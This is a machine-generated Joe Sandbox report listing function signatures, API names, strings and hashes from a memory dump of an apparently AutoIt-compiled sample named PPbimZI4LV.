                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 2610073882-3931177956
                                                                      • Opcode ID: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                      • Instruction ID: 10df8815596cb75a2ea3e93a50da6e55b570848ac76cfd43a98af89615da7268
                                                                      • Opcode Fuzzy Hash: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                      • Instruction Fuzzy Hash: 07027F32E0D68285E758BF65E15617D63A1FF04B84F098635CA1EE7B96EF2DE850E300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                      • String ID: aut
                                                                      • API String ID: 130057722-3010740371
                                                                      • Opcode ID: 8151bde7e6da6f3b12a4a5ff4842a8641766afaedbe84f8bf96e1b0349655ed7
                                                                      • Instruction ID: 0830ea85a4d3cab2d0d946354d083ab028e25fb8136b7194dc3b325209bbe35a
                                                                      • Opcode Fuzzy Hash: 8151bde7e6da6f3b12a4a5ff4842a8641766afaedbe84f8bf96e1b0349655ed7
                                                                      • Instruction Fuzzy Hash: E5C16432A1CAC695EB24FF25E8416E96360FB85788F404136EA8DD7B5AEF7CD205D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 2443926738-1918224756
                                                                      • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                      • Instruction ID: 6ff81c33f2ad1121570428617b71ac6f9a90a82eef1917c8d3020b393ac80715
                                                                      • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                      • Instruction Fuzzy Hash: F891AA32A18B8686EB50EF65E4467AC37A1FB88B84F504036DE4EA7B59EF3CD045D710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID:
                                                                      • API String ID: 2598888154-3916222277
                                                                      • Opcode ID: e1ea9e16f9a9bfdaed1ffffacebf4c97c95e32c76797c3317cfc9a85c4ad152f
                                                                      • Instruction ID: c9239d9d5c96c2a2393bf2fe3a50af870559215e8b535d784abbcd07288af735
                                                                      • Opcode Fuzzy Hash: e1ea9e16f9a9bfdaed1ffffacebf4c97c95e32c76797c3317cfc9a85c4ad152f
                                                                      • Instruction Fuzzy Hash: 8E517836B18641CBE790EF75E445AAE77B1F748B88F008129EE49A7B18DF38D419CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 2706829360-2785691316
                                                                      • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction ID: 0ff424095d2f82dedc44795667c52fac5180f39d41abcef57390bd1dde647748
                                                                      • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction Fuzzy Hash: 61516332B29A5689EB44FF65D8826BC2770FB84B89F444031DE0ED7666EF38D449D740
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF6439BFD7B), ref: 00007FF6439C1143
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction ID: 3bc9077d80eaa8d9eea4394ca43321feb9e31d04e314a2ee7cf7856ca2bbc215
                                                                      • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction Fuzzy Hash: 97E19312F0CA9781EE60BB65D8422B92391BF10B98B444535DB2EE77D6FE3CE945E304
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 4125642244-438819550
                                                                      • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction ID: 3a03bfa12ad0f2c49f47458e36f11ef8763e8332733474b25024162d550e7318
                                                                      • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction Fuzzy Hash: EC818122A1CA8286EB54FF15D8426BD67A0FB44B84F840136DA4EE7B96FF7CD544E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: P
                                                                      • API String ID: 1460738036-3110715001
                                                                      • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction ID: f8a9f7b5ef8ef1f1b1fb316e0bd2a0800104a69e777b688bd5b4621808ab8dbe
                                                                      • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction Fuzzy Hash: F771D222A0C6828AF760FF2594462BD27A1FF84768F544431DA4EE7796EF7CE446E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-3080491070
                                                                      • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction ID: 13f1093e819b38db25010638aec051aa893a58563b9ef94e1d0757b77f76417c
                                                                      • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction Fuzzy Hash: B3616F31B1CA9296EB00FB64E9825ED6361FB84744F901432EA4DE369BEF7CE506D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 4051287042-2268648507
                                                                      • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction ID: b1e9f68b495a2cdc1b854402ddc31afc72ef012e2a3a7de111729353deaba124
                                                                      • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction Fuzzy Hash: 35516F22B1CA4296EB00FB64E8434ED6361FF94794B905432E90DE769BEF7CE50AD740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                      • String ID: BUTTON
                                                                      • API String ID: 3935177441-3405671355
                                                                      • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction ID: 43b4fdac63e6ab6fe84067f77cb6ca269cc3b1859294d73b890aa4bf1eba2a0a
                                                                      • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction Fuzzy Hash: A5316724A1DA07C6FB50BF21F8977352361AF88748F084030D90EE67E6EF2CE484AB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1974058525-0
                                                                      • Opcode ID: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction ID: 4f965f5c136facb4769614538e1d4087f63af873c96ce7c790b5bf90ece24180
                                                                      • Opcode Fuzzy Hash: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction Fuzzy Hash: 33918931A0EA0285FF50FF65A9926B837A4BF84B84F580535C91EE7256EF3CE490A350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction ID: f209ce75afd197823ea919474c3cbc84d06626ff7ef97f9295d6d177679bd1c8
                                                                      • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction Fuzzy Hash: 4B617272B186418BE754EF6AE44566D77A2FB88B84F508139DE09E3F58EF3CD9058B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerTypewcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 1561581874-1000479233
                                                                      • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction ID: f8b03d0b07425e523b08439673af793934d4e3734ca48ba7db8fae22374a861d
                                                                      • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction Fuzzy Hash: 8FD10522E0CA9641EA20BB15D5421B963A1FF94BD4F604331D95DE3BD6FF3CE955A300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4010642439-1241985126
                                                                      • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction ID: 7f1e5c628798da8d87e795e83222f56fcdbee8cb90d3b4b386fed95d94326b9f
                                                                      • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction Fuzzy Hash: E4A1D423B0C6428BEA24BF15E4466B96361FF85784F444035CA9EE3B96EF3DE905DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID: P
                                                                      • API String ID: 1268354404-3110715001
                                                                      • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                      • Instruction ID: 9ac791185d177350b163177c18477d475b44778aed6f19ec688ee94713c1bb1a
                                                                      • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                      • Instruction Fuzzy Hash: EF61A136A0DA428AEB54FF65D9426B92790FB84B98F140935DD0EE3799EF3CE440A740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-2391861430
                                                                      • Opcode ID: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                      • Instruction ID: 8049ec284c68a9e86ad418cf86943e3cdbde873e65c2ec7f63562530e9028821
                                                                      • Opcode Fuzzy Hash: 31c5b23564cdfe61f8d669abd9ab3ad79c4f4694b43ce296d1458ee3b9400a01
                                                                      • Instruction Fuzzy Hash: 6C719122B1CA9296EB40FB65E9824ED6320FF40744F801432EA0DE769BEF3CE506D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                      • String ID: static
                                                                      • API String ID: 3821898125-2160076837
                                                                      • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                      • Instruction ID: f528b6a1d4899df48858f84300e69dff1cecb25944e11a69d16717fb3e7b5d42
                                                                      • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                                      • Instruction Fuzzy Hash: 19417B32A0C78187EB60AF25A446B5AB3A1FB887A1F504235DA9D93B99DF3CD444DF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction ID: 391e791e620152f2ab38a6c16d728652f1864d3c2d50e2536d0bcf5e649fd1c9
                                                                      • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction Fuzzy Hash: EF61A022F1865286EB14FF61D8425AC77B4FB84B88B048436DE1DE3B96EF38D449DB40
                                                                      APIs
